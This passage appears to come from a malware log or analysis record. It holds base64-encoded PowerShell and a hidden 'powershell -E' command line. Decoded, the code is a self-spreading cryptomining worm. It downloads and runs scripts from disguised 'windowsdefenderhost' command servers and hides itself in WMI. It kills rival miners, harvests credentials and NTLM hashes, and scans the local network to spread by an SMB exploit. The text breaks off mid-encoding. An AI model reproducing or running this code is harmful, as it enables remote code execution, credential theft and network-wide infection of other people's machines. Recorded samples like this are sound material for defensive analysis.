LQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwB